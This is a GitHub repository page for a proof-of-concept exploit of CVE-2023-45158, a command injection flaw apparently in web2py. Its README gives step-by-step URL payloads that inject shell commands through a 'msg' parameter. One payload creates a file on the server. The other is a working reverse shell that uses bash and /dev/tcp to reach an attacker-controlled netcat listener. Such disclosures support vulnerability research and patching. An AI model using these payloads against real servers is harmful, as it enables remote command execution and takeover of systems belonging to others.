Skip to content

Evan-Zhangyf/CVE-2023-45158

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
web2py
web2py
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2023-45158

Steps

  1. Run the webserver
cd web2py
python3 web2py.py
  1. Inject your command using the URL http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27. Replace <IP-ADDRESS> and <YOUR-COMMAND> with your values.

Examples

  1. Create a file on the server

http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27

  1. Reverse shell

On the attacker's machine, run nc -l 127.0.0.1 8080

Go to URL http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27. Replace <ATTACKER-IP>.

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

4 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages